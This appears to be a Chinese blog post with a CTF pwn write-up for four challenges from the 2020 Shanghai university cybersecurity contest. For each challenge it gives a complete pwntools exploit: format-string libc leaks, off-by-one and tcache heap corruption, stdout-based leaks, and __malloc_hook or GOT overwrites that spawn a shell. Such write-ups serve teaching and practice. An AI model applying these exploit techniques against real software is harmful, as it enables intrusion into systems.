2020第六届上海市大学生网络安全大赛pwn wp

最新推荐文章于 2024-05-27 02:17:43 发布
最新推荐文章于 2024-05-27 02:17:43 发布
阅读量659 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45595732/article/details/110176873
版权

2020年全国大学生网络安全邀请赛暨第六届上海市大学生网络安全大赛




体验一般,前三道2道原题一道常规题,cpu_emulator还挺有意思

EASY_ABNORMAL

​ 湖湘杯2020原题,修改了提示字符而已,漏洞点在于格式化字符串和c++一个异常的处理,完全可以直接调出来,在后面函数输入非法的程序就会被劫持。

​ glibc2.23

exp

from pwn import*
context.log_level = 'debug'
context.update(arch='amd64',os='linux',timeout=1)
p = process('./pwn')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
ogg = [0x45226,0x4527a,0xf0364,0xf1207]
def pr(a,addr):
	log.success(a+'===>'+hex(addr))

def show_name():
	p.sendlineafter("CHOICE :",'1')

def add(content='a'):
	p.sendlineafter("CHOICE :",'2')
	p.sendlineafter("cnt:\n",content)

def delete(index):
	p.sendlineafter("CHOICE :",'3')
	p.sendlineafter("idx:",str(index))
	
def show_note():
	p.sendlineafter("CHOICE :",'4')
def gift(content):
	p.sendlineafter("CHOICE :",'23333')
	p.sendlineafter("INPUT:",content)

p.sendlineafter('NAME: ','%11$p')
show_name()
#gdb.attach(p)
p.recvuntil('INFO:')
leak = int(p.recvuntil('\n')[:-1],16) -240
libcbase = leak - libc.sym['__libc_start_main']
one = libcbase + ogg[0]
pr('libcbase',libcbase)
pr('one',one)
add('a'*0x10+p64(0x1)+p64(one))
add('a')
delete(0)
delete(1)
show_note()
p.recvuntil("2:")
heap_addr=u64(p.recv(6).ljust(8,'\x00'))+0x18
pr('heap_povit',heap_addr)
gift("a"*0x20+p64(heap_addr+8)+"a")

p.interactive()

lgtwo

glibc2.23

打stdout泄露libc

off-by-one

from pwn import*
#context.log_level = 'debug'
context.update(arch='amd64',timeout=0.2,os='linux')

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
ogg = [0x45226,0x4527a,0xf0364,0xf1207]
def pr(a,addr):
	log.success(a+'===>'+hex(addr))

def add(size,content='\x00'):
	p.sendlineafter('>> ','1')
	p.sendlineafter('size?\n',str(size))
	p.sendafter('content?\n',content)

def delete(index):
	p.sendlineafter('>> ','2')
	p.sendlineafter('index ?\n',str(index))

def edit(index,content):
	p.sendlineafter('>> ','4')
	p.sendlineafter('?',str(index))
	p.sendafter('content ?\n',content)
def pwn():
	add(0x18)# 0
	add(0x10)# 1
	add(0x60)# 2
	add(0x50)# 3
	add(0x10)# 4
	edit(0,'\x00'*0x18+'\xf1')
	delete(1)
	delete(2)
	add(0x18) #1
	add(0xc0) #2
	edit(2,'\xdd\x25')
	edit(1,'\x00'*0x18+'\x71')

	add(0x60) #5
	add(0x60) #6
	edit(6,'\x00'*0x33+p64(0xfbad1800)+p64(0)*3+'\x00')
	leak = u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')
	libcbase = leak - (0x7ffff7dd2600-0x7ffff7a0d000)
	malloc_hook = libcbase + libc.sym['__malloc_hook']
	libc_realloc = libcbase + libc.sym['__libc_realloc']
	one = libcbase + ogg[1]
	pr('leak',leak)
	pr('libcbase',libcbase)
	pr('malloc_hook',malloc_hook)
	pr('one',one)
	pr('__libc_realloc',libc_realloc)
	pause()
	delete(2)
	edit(5,p64(malloc_hook-35))
	add(0x60)#2
	add(0x60)#7
	edit(7,'\x00'*11+p64(one)+p64(libc_realloc+11))
	p.sendlineafter('>> ','1')
	#gdb.attach(p,'b *'+str(libc_realloc+11))
	p.sendlineafter('size?\n','16')
	p.interactive()
while True:
	try:
		p = process('./pwn')
		pwn()
		break
	except:
		print 'trying...'

maj0rone

ciscn2020初赛原题

c++

#!/usr/bin/python
#coding:utf-8
from pwn import *
context.update(arch="amd64",os='linux',timeout=1)
#context.log_level='debug'
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")

def add(sz):
	io.sendlineafter(">> ",'1')
	io.sendlineafter("question\n\n",'80')
	io.sendlineafter("?\n",str(sz))
	io.sendlineafter("no?\n",'yes')

def dele(idx):
	io.sendlineafter(">> ",'2')
	io.sendlineafter("index ?\n",str(idx))
	
def edit(idx,ct):
	io.sendlineafter(">> ",'4')
	io.sendlineafter("index ?\n",str(idx))
	io.sendafter("__new_content ?\n",ct)
	
def pwn():
	add(0x90)#0
	add(0x60)#1
	add(0x20)#2
	dele(0)
	dele(1)
	add(0x10)#3_addr=0_addr
	edit(0,"a"*0x10+p64(0)+p64(0xf1))
	add(0x70)#4
	edit(1,p16(0x2620-0x43))
	add(0x60)#5
	add(0x60)#6 stdout
	edit(6,"\x00"*0x33+p64(0xfbad1800)+p64(0)*3+'\x00')
	libc_leak=u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x3c5600
	log.success("libc_leak==>"+hex(libc_leak))
	malloc_hook=libc_leak+libc.sym['__malloc_hook']
	#0x45226 0x4527a 0xf0364 0xf1207
	one_gadget=libc_leak+0xf1207
	log.success("malloc_hook==>"+hex(malloc_hook))
	add(0x60)#7
	dele(7)
	edit(7,p64(malloc_hook-0x23))
	add(0x60)#8
	add(0x60)#9
	edit(9,'\x00'*0x13+p64(one_gadget))
	io.sendlineafter(">> ",'1')
	io.sendlineafter("question\n\n",'80')
	io.sendlineafter("?\n",'144')
	#pause()
	io.interactive()
if __name__=='__main__':
	while True:
		try:
			io=process('./pwn')
			pwn()
		except:
			print 'trying'
			io.close()

cpu_emulator

​ 感觉是4道里最有趣的一道了,模拟了cpu的工作,32个寄存器,每个寄存器32位,指令长度也是32位,指令是分段的,且有两种解析方式,漏洞在第一种解析方式。前期逆向需要做好大量工作,理解工作原理之后其实漏洞也相对好找。

​ glibc2.27

​ 保护开的不多,got表可写,pie也没开。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qkGO3jWa-1606359542217)(.\cpu_emulator1.png)]

关键漏洞在于第一种解析方式 case 0x2b的地方,可以造成一个堆上的任意写

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6T8Uunit-1606359542220)(.\cpu_emulator2.png)]

通过一次写造成size变化就可以控制别的堆块,利用tchace的特性可以把堆块申请到任意地址,这里我们去修改got表。

got修改顺序:

  • 先修改free_got为printf_plt(这里需要申请堆块到free_got-0x8的位置,因为malloc会把p->fd清零,这里会把puts_got表也给修改所以要做一个偏移),防止free导致的程序终止。
  • 再修改atoi_got为printf_got,这样就可以造出一个格式化字符串漏洞,泄露libcbase。
  • 再次修改atoi_got为system或者onegadget,getshell。

exp:

from pwn import*
context.log_level = 'debug'
p = process('./emulator')
elf = ELF('./emulator')
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
ogg = [0x4f3d5,0x4f432,0x10a41c]
free_got = elf.got['free'] #0x602018
atoi_got = elf.got['atoi'] #0x602058
printf_plt = elf.plt['printf']
exit_got = elf.got['exit'] #0x602060

def pr(a,addr):
	log.success(a+'====>'+hex(addr))

def setInstruction(size,content):
	p.sendlineafter('>> ','1')
	p.sendlineafter('size:\n',str(size))
	p.sendafter('instruction:\n',content)

def setInstruction2(size,content):
	p.sendafter('>> ','1')
	p.sendlineafter('size:\n','%'+str(size)+'c')
	p.sendafter('instruction:\n',content)

def getOrder1(a1,a2,a3,a4):
	result = (a1<<26) + (a2<<21) + (a3<<16) + a4 
	return p32(result)

def run():
	p.sendlineafter('>> ','2')

setInstruction(0x100,'\x00')
setInstruction(0x20,'\x00')
setInstruction(0x30,'\x00')
setInstruction(0x40,'\x00')

payload1 = getOrder1(8,0,0,0xf1) + getOrder1(8,0,0,0xe0) + getOrder1(8,1,1,0x8+1) + getOrder1(0x2b,1,0,0xffff)+getOrder1(1,0,0,0)
setInstruction(0x100,payload1)
run()

payload2 = '\x00'*0x100  
payload2 += p64(0)+p64(0xa1)+p64(free_got-8).ljust(0x20,'\x00')
payload2 += p64(0)+p64(0xb1)+p64(atoi_got).ljust(0x30,'\x00')
payload2 += p64(0)+p64(0xc1)+p64(atoi_got).ljust(0x40,'\x00')
setInstruction(0x1c0,payload2)
run()

setInstruction(0x20,'\x00')
setInstruction(0x30,'\x00')
setInstruction(0x40,'\x00')

setInstruction(0x20,p64(printf_plt)*2)
setInstruction(0x30,p64(printf_plt))
p.sendlineafter('>> ','%15$p')
leak = int(p.recvuntil('\n')[:-1],16) - 231
libcbase = leak - libc.sym['__libc_start_main']
one = libcbase + ogg[0]
system_addr = libcbase + libc.sym['system']
pr('libcbase',libcbase)
pr('one',one)
pr('system_addr',system_addr)

setInstruction2(0x40,p64(system_addr))
p.sendlineafter('>> ','sh')
#gdb.attach(p,'b *0x04010CF')

p.interactive()
TTYflag
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
2018 上海市大学生网络安全大赛wp
Risker
11-06 3029
欢迎关注我的新博客: http://mmmmmmlei.cn 利用周末打了上海市大学生网络安全大赛,最后打了第三,这次的 Misc 真的是难上天,除了签到其他都做不动…膜一波复旦的师傅们。比赛中我打的是 Crypto 和部分 Web,这里也贴了一些队友的 wp。 Misc 签到 直接 base32 解码。 Pwn baby_arm arm 架构,核心思想是改掉 mprotect 函数的参数,使 b...
2020第十三届全国大学生信息安全竞赛crypto wp
Gm1y's Blog
08-21 3816
前言 这次国赛密码题有三道,我只做出了两题。可惜web、逆向和pwn零封了,所以最后成绩不太理想。 bd 没什么好说的,wiener attack秒了 #sage from Crypto.Util.number import * from sage.all import * from random import randint from gmpy2 import invert,iroot#不能全部导入,会有问题 def list_cf(p,q): ''' return continued F
第九届上海市大学生网络安全大赛暨“磐石行动”2024第二届全国高校网络安全攻防活动 初赛 网络安全赛道 个人Writeup(Re方向)
最新发布
CHTXRT的博客
05-27 811
战队名称:Besti学研组战队排名:18个人排名:33。
2022柏鹭杯pwn复现
m0_63437215的博客
11-19 1358
2022柏鹭杯pwn
网络防御与对抗-wp漏洞利用
网络安全领域优质创作者
11-05 824
wpscan-u http://10.11.1.251/wp/ --enumeratevpvt是扫描主题漏洞 扫描插件漏洞 wp-forum - SQL Injection 参考连接:Wordpress wp-forum plugin SQL Injection - CXSecurity.com http://10.11.1.251/wp/wp-content/plugins/wp-forum/feed.php?topic=-4381+union+select+group_c...
2021陇剑杯网络安全大赛wp-webshell部分(详细题解)
偷一个月亮
09-15 6666
3.1 3.2 其中web根目录可以再system命令中看到 3.3 3.4 3.5 写frpc配置文件,推测为frpc,正确 实际上传动作为 L3Zhci93d3cvaHRtbC9mcnBj解码base64即为/var/www/html/frpc 3.6 3.5中写配置动作,hex转字符后,如下 3.7 同上 ...
第六届上海市大学生网络安全大赛 | Wp
Lemon's blog
12-03 1207
文章目录MISC0x00:签到0x01:pcapWeb0x01:千毒网盘 MISC 0x00:签到 linux运行一下即可得到flag 0x01:pcap 提示:请分析附件中的dnp3协议 Web 0x01:千毒网盘 这个题有源码泄露 http://eci-2ze636qtsw50d6niueft.cloudeci1.ichunqiu.com/www.zip 在code.php文件中发现sql语句,做题的时候没有观察到index.php文件中的变量覆盖,一直以为是要绕过单引号,然后进行SQL注入得
高校战“疫”网络安全分享赛pwn部分wp
starssgo的博客
03-11 848
高校战“疫”网络安全分享赛pwn部分wp 博客地址 easyheap 刚复现的第一题,并且在刚开始的时候连洞都找不到…可真是当头一棒。 漏洞在申请的大小大于0x400时,return。这时ptr[i]没有被释放,接下来就是常规劫持ptr[i]堆块上的指针为got表。修改got表。来实现利用。 # -*- coding: utf-8 -* from pwn import *from LibcSea...
【广东大学生网络攻防大赛Pwn | jmp_rsp 题目附件
05-24
5. **解题策略**:在广东大学生网络攻防大赛的"Pwn"类题目中,参赛者需要理解漏洞的原理,分析程序的内存布局,找到可利用的gadgets,构造溢出payload,并利用"jmp_rsp"或其他方法控制程序执行流程。这需要扎实的...
长春理工大学第六届网络安全校赛题目
06-15
内有re+web+pwn+misc杂项 博文地址:https://blog.csdn.net/m0_64659074/article/details/123853255?spm=1001.2014.3001.5502
【天格】战队-未解出题目附件-第六届“强网杯”全国网络安全挑战赛
08-01
【天格】战队在第六届“强网杯”全国网络安全挑战赛中分享了多个未解出的题目附件,这些附件涵盖了网络安全领域的多个子领域,包括逆向工程、漏洞利用(PWN)、密码学(Crypto)以及杂项(Misc)。通过分析这些文件...
2020第六届“湖湘杯”网络安全技能大赛洞庭决赛-互联网选拔赛-第二场-线上CTF赛.zip
11-01
2020第六届“湖湘杯”网络安全技能大赛洞庭决赛-互联网选拔赛-第二场-线上CTF赛 真题。包含web,misc,pwn,reverse,crypto等20道题目。仅供学习交流。
2020第六届“湖湘杯”网络安全技能大赛洞庭决赛第一场-理论答题赛
11-11
第六届“湖湘杯”网络安全技能大赛洞庭决赛第一场-理论答题赛200道原题,答题的时候保存的,跟大家分享一下,希望有需要的小伙伴可以自行学习一下。
“东华杯”2021年大学生网络安全邀请赛.zip
12-07
"东华杯"2021年大学生网络安全邀请赛是一场旨在提高大学生网络安全技能和意识的重要赛事。CTF,即Capture The Flag,是网络安全领域的一种竞赛形式,参赛者需要运用各种安全技能解决难题,捕获特定的目标("flag")...
2021年“绿城杯”网络安全大赛
09-30
2021年“绿城杯”网络安全大赛是一场聚焦网络安全技术的竞技活动,旨在提升参赛者在信息安全领域的专业技能,增强社会对网络安全的重视。CTF(Capture The Flag)是网络安全竞赛的一种形式,参赛团队通过解决一系列...
信息安全web题wp
星|Donstpast
10-11 348
1.web1 进入题目网址之后,查看源码, 发现一个base64编码,用在线工具解码,获得密码 尝试输入时发现不允许输入内容,这是一个前端限制,f12, 将标注处删除,回车,此时发现可以输入内容 输入内容后发现提示需要本地访问,那么我们就需要修改ip地址,使用burp抓包后, 加入X-Forwarded-For: 127.0.0.1(这就相当于本地访问了)后,发送包,获得本题flag 所以。提交falg:flag{ma1atutou_is_very_de1eci0us} 2.web2 本题提示挺好,P
[网络安全自学篇] 八十.WHUCTF之WEB类解题思路WP(代码审计、文件包含、过滤绕过、SQL注入)
热门推荐
杨秀璋的专栏
05-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。这篇文章将介绍WHUCTF部分题目,第一次参加CTF,还是能学到很多东西。下面分享四个我完成的WEB类型题目的解题过程,希望对您有所帮助。本来感觉能做出6道题目,但有两道题卡在某个点,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬
网络安全实验室-基础关 WP
ROK_LI的博客
03-24 1474
这里写自定义目录标题 1.key在哪里? 直接打开源地址就可以看到key 2.再加密一次你就得到key啦~ 根据题目得到的提示,直接将xrlvf23xfqwsxsqf加密一次,放到一个网站去http://www.mxcz.net/tools/rot13.aspx直接一个个的试,后面得出是rot13 3.猜猜这是经过了多少次加密? 可以根据加密后的信息得出“=”是通过base64加密得出来的,然...
[网络安全自学篇] 八十一.WHUCTF之WEB类解题思路WP(文件上传漏洞、冰蝎蚁剑、反序列化phar)
杨秀璋的专栏
05-30 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF部分题目,包括代码审计、文件包含、过滤绕过、SQL注入。这篇文章将讲解Easy_unserialize解题思路,详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。第一次参加CTF,还是学到了很多东西,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
2022福建移动杯网络安全大赛:实战CTF竞赛规程详解
大赛采用网络安全CTF夺旗赛模式,涵盖了多个专业领域,如密码学、杂项、逆向工程、Pwn(指程序漏洞利用)和Web安全。参赛者需展示他们在漏洞挖掘、安全应急响应、数据安全、隐写技术和取证分析等方面的技能,同时还...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值